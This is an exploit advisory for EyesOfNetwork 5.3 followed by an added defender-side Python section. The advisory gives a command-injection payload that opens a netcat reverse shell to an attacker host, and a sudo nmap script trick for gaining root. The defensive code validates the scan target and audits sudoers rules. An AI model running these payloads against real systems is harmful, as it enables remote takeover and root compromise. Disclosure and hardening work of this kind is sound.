
# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

# Authenticated Remote Code Execution flaw > remote shell > PrivEsc
#
# A user with access to "/autodiscover.php" can execute remote commands, get a reverse shell and root the targeted machine.

==============================================
Initial RCE

In the webpage: https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not validated. It is possible to put any command after an "&", so RCE is possible with a simple netcat command like:

& nc -e /bin/sh <IP> <PORT>

==============================================
PrivEsc

The EyesOfNetwork apache user can run "nmap" with sudo privileges and the NOPASSWD attribute, so it is possible to become the root user with the classic PrivEsc method:

echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
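Added defender-side example, not part of the original advisory or of EyesOfNetwork (which is PHP; the controls are shown in Python here): an allow-list check for the "target" parameter, the flawed shell-string pattern next to the argv form that neutralises the "&" injection, and a small sudoers audit that flags the NOPASSWD nmap rule the PrivEsc relies on. Function names, the hostname regex and the sample sudoers text are assumptions/constructed.

```python
import ipaddress
import re

# DNS hostname shape (RFC 1123 labels); assumed accepted format for "target".
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)

def is_valid_target(target: str) -> bool:
    """Allow-list check: IP address, CIDR network or hostname; '&', ';' etc. fail."""
    target = target.strip()
    if not target:
        return False
    try:
        ipaddress.ip_network(target, strict=False)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))

def vulnerable_cmdline(target: str) -> str:
    """The flawed pattern: raw input spliced into a line handed to a shell, so a
    target of '& nc ...' makes the shell run nmap and then a second command."""
    return f"nmap -sn {target}"

def hardened_argv(target: str) -> list:
    """Validated input becomes one argv element for subprocess.run(argv,
    shell=False); no shell ever parses the line, so metacharacters are inert."""
    if not is_valid_target(target):
        raise ValueError("invalid scan target")
    return ["nmap", "-sn", target.strip()]

def risky_sudoers_lines(sudoers_text: str, binaries=("nmap",)) -> list:
    """Audit helper for the PrivEsc half: flag NOPASSWD rules granting tools that
    can run scripts or spawn a shell (nmap executes NSE Lua via --script)."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if "NOPASSWD" not in line:
            continue
        if any(re.search(rf"(^|[\s/,]){re.escape(b)}(\s|$)", line) for b in binaries):
            hits.append(line)
    return hits

# Constructed sample sudoers content modelled on the advisory's description.
SAMPLE_SUDOERS = """\
root ALL=(ALL) ALL
apache ALL=(ALL) NOPASSWD: /usr/bin/nmap  # the rule the PrivEsc abuses
nagios ALL=(ALL) /usr/bin/systemctl restart nagios
"""
```

Removing the NOPASSWD nmap rule (or restricting it to a wrapper that forbids --script) closes the second half of the chain even if the first is not yet patched.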